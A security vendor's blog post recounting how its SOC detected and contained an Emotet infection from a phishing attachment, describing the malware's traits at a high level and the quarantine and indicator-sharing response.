Home Blog Emotet: What Happens When Users Open the Attachment Emotet: What Happens When Users Open the Attachment BlueVoyant Share: Facebook Twitter LinkedIn “Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities. Emotet is one of the most prolific variants of malware today. In Q1 2019 it accounted for over 40% of all detections by the BlueVoyant SOC. Emotet is a banking trojan designed to steal account details. It steals FTP credentials. It also steals emails which it uses to disguise itself as legitimate communications that allow it to move laterally across the network. Emotet has evolved in sophistication. In recent variants, we have seen it morph into a dropper to deliver other malware, ransomware and banking trojans (read Top 5 Cybercrimes and Prevention Tips for more information on these cyber crimes and others). It is polymorphic and evades signature-based detection by changing every time it is downloaded. It has the ability to detect when it’s in a Sandbox and will go dormant to avoid detection. Emotet is a very nimble malware that employs multiple techniques for lateral movement. In a recent attack, 48 users received a phishing email with a malicious .doc (maldoc) attached. Despite internal security training, two users opened the attachment. This executed a VBA (Virtual Basic for Applications) script infecting the two devices. Our SOC analysts saw the users open the emails and execute the maldoc. The initial investigation revealed the maldoc was not a known malware identified on any threat intelligence sources. They determined it was malicious and immediately blacklisted it. We also observed a PowerShell script, with suspicious command lines, kickoff on the infected devices. As a result, the SOC immediately quarantined the infected devices to prevent the attack from moving laterally through the network. The attack took place early in the morning. These actions were completed before the morning rush to work, preventing others from opening the malicious email. As a follow-up, we provided the client with the Command and Control (C2) IP addresses found in the VBA script. Emotet retrieves payloads and installs updates from C2 servers. We also delivered indicators identified in the PowerShell script to help detect and prevent future attacks. Share: Facebook Twitter LinkedIn Related reading Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more
BlueVoyant Share: Facebook Twitter LinkedIn “Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities. Emotet is one of the most prolific variants of malware today. In Q1 2019 it accounted for over 40% of all detections by the BlueVoyant SOC. Emotet is a banking trojan designed to steal account details. It steals FTP credentials. It also steals emails which it uses to disguise itself as legitimate communications that allow it to move laterally across the network. Emotet has evolved in sophistication. In recent variants, we have seen it morph into a dropper to deliver other malware, ransomware and banking trojans (read Top 5 Cybercrimes and Prevention Tips for more information on these cyber crimes and others). It is polymorphic and evades signature-based detection by changing every time it is downloaded. It has the ability to detect when it’s in a Sandbox and will go dormant to avoid detection. Emotet is a very nimble malware that employs multiple techniques for lateral movement. In a recent attack, 48 users received a phishing email with a malicious .doc (maldoc) attached. Despite internal security training, two users opened the attachment. This executed a VBA (Virtual Basic for Applications) script infecting the two devices. Our SOC analysts saw the users open the emails and execute the maldoc. The initial investigation revealed the maldoc was not a known malware identified on any threat intelligence sources. They determined it was malicious and immediately blacklisted it. We also observed a PowerShell script, with suspicious command lines, kickoff on the infected devices. As a result, the SOC immediately quarantined the infected devices to prevent the attack from moving laterally through the network. The attack took place early in the morning. These actions were completed before the morning rush to work, preventing others from opening the malicious email. As a follow-up, we provided the client with the Command and Control (C2) IP addresses found in the VBA script. Emotet retrieves payloads and installs updates from C2 servers. We also delivered indicators identified in the PowerShell script to help detect and prevent future attacks. Share: Facebook Twitter LinkedIn Related reading Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more
Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more
Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more
Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more